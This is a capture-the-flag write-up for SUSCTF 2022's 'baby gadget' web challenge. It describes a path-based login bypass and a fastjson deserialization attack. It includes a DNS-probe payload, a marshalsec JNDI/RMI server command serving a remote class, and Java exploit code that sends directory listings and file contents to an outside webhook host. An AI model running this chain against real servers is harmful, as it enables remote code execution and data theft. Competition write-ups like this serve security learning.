SUSCTF 2022 - web/baby gadget v1.0

[aszx87410]

We found a login bypass via /;/admin/, after the bypass you can see the admin portal, and there is a mailbox page:

You can download a lib.zip to see what libraries they used, and this file for sure is the key: fastjson-1.2.48.jar

After few tries we found that the endpoint POST /admin/mailbox.jsp is vulnerable. We can send a JSON data via inputtext={JSON}.

By sending a simple query, you can validate that it's vulnerable because we received the DNS query:

{"abc":{"@type":"java.net.Inet4Address","val":"1486fo.dnslog.cn"}}

After found the injection entry, we tried few payloads we can find on the internet, but somehow it does not work.

So I followed the instruction here: 红队武器库:fastjson小于1.2.68全漏洞RCE利用exp to run a RMI server via:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://1.1.1.1:8888/#Exploit" 9999

Somehow, my RMI server did receive the request, but file server(to serve Exploit.class) did not.

I decided to change from RMI to JNDI, and it magically works, it did access my Exploit.class.

But the exploit code still no response, we don't know how to do and stuck for a while.

Later on, I change the Java exploit code to Thread.sleep(5) to see if the remote server executes our code or not, and the answer is surprisingly true.

So, I updated my Java exploit, to send a request to my server, like this:

import java.io.*;
import java.net.*;
import java.util.*;

public class Exploit{
    public Exploit() throws Exception {
        String str = "test";
        URL url = new URL("https://webhook.site/bad84752-95a1-45c4-8395-e5577ea1112b");
        Map<String,Object> params = new LinkedHashMap<>();
        params.put("msg", str);
        StringBuilder postData = new StringBuilder();
        for (Map.Entry<String,Object> param : params.entrySet()) {
            if (postData.length() != 0) postData.append('&');
            postData.append(URLEncoder.encode(param.getKey(), "UTF-8"));
            postData.append('=');
            postData.append(URLEncoder.encode(String.valueOf(param.getValue()), "UTF-8"));
        }
        byte[] postDataBytes = postData.toString().getBytes("UTF-8");

        HttpURLConnection conn = (HttpURLConnection)url.openConnection();
        conn.setRequestMethod("POST");
        conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
        conn.setRequestProperty("Content-Length", String.valueOf(postDataBytes.length));
        conn.setDoOutput(true);
        conn.getOutputStream().write(postDataBytes);
        Reader in = new BufferedReader(new InputStreamReader(conn.getInputStream(), "UTF-8"));
    }

    public static void main(String[] args) throws Exception {
    }
}

After received the request, I tried to list files and send it back to my server, but no response. So, I added a try catch to see what's going on:

String str = "";
try{      
  File f = new File("/var");
  File[] paths = f.listFiles();
  str = paths.toString();
  for (int i = 0; i < paths.length; i++) {
    str += paths[i].toString() + ",";
  }
 
} catch(Exception e){
   str = e.toString() + "," + e.getMessage();
}

It's java.lang.reflect.InvocationTargetException, and I still don't know why the server throwing this exception. Maybe the server blocks certain functions? or it's the problem with JDK version?

Anyway, I stuck for a while again, and then I decided to try to read a file, instead of listing it. To my surprise again, it works.

Here comes the end of the story, I read /flag then, luckily, I got the flag. I am a lucky guy.